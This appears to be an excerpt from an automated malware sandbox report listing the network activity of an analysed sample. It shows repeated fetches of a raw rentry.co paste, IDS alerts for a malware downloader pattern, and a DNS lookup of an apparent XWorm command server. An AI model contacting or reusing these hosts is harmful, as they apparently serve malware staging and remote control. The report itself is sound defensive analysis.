              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: Joe Sandbox ViewIP Address: 104.26.3.16 104.26.3.16
              Source: Joe Sandbox ViewIP Address: 194.5.152.215 194.5.152.215
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60609 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60619 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60616 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60633 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60650 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60615 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60681 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60713 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60658 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60695 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60699 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60714 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60684 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60722 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60626 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60606 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60736 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60671 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60725 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60716 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60711 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60734 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60621 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60718 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60732 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60738 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60751 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60755 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60752 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:60760 -> 104.26.3.16:443
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
              Source: global trafficDNS traffic detected: DNS query: xworm1337.ddnsgratis.com.br
              Source: global trafficDNS traffic detected: DNS query: rentry.co
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:41:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8dRJ5NtvoCQTJEZpDmmaQDU6raXQeF7m%2BeIYaI5sRiuujcgvL4XuKczioIQvJooYZ2I%2BYe6YHuCpyT5k5ZZHxlyDULZP1TKIbEJzEmT7ik7Q8m50EmFY%2Fkz%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eafd1e6c2cc8-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:41:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUiEVFQ8JeJjKYl513WMNd3c8IqshGWk0XmoAW9bfRjymOX1D%2FXv%2BKDnH2Y8EQsF5xhM5xPXipqYWUmP6tDSymE5MnTOCIA3IJQSna74q8IgVTqoX3%2F7TI5jLQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eb0fbd42e9b1-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:41:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZKULzn72Xjetk9Mwmw0iMI%2FVJN294QiQeTjLmeaiWZISIVHAlO%2FAQSdRlxas1AwBJWvYCC7k7csPuO38uDpJq29qh9Q%2BsYSGdhywcBkUM%2FJ3pXK2bZp2Jarfw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eb227ee30c13-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:41:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mg9qr3EqlzelfvxW0x2bPj1VQVK2YntWKeydhqWS9haiwqklsTNu77TKcCv6CPFPDCq5pT4bRMOykKIChQqjyKzGUsTa1BZ9AP7ZULrgf1T5L1wQ7N6D%2FVM5tw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eb382fb56bc5-DFW
